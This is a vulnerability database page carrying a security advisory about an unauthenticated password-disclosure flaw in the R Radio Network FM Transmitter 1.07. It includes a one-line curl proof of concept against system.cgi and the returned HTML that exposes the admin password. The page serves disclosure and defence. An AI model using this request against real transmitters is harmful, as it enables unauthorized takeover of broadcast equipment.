Vulners
Lucene search
R Radio Network FM Transmitter 1.07 system.cgi - Password Disclosure
R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure
Vendor: R Radio Network
Product web page: http://www.pktc.ac.th
Affected version: 1.07
Summary: R Radio FM Transmitter that includes FM Exciter and
FM Amplifier parameter setup.
Desc: The transmitter suffers from an improper access control
that allows an unauthenticated actor to directly reference the
system.cgi endpoint and disclose the clear-text password of the
admin user allowing authentication bypass and FM station setup
access.
Tested on: CSBtechDevice
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5802
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5802.php
09.10.2023
--
$ curl -s http://192.168.70.12/system.cgi
<html><head><title>System Settings</title>
...
...
Password for user 'admin'</td><td><input type=password name=pw size=10 maxlength=10 value="testingus"></td>
...
...
$Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Mar 2024 00:00Current
7.4High risk
Vulners AI Score7.4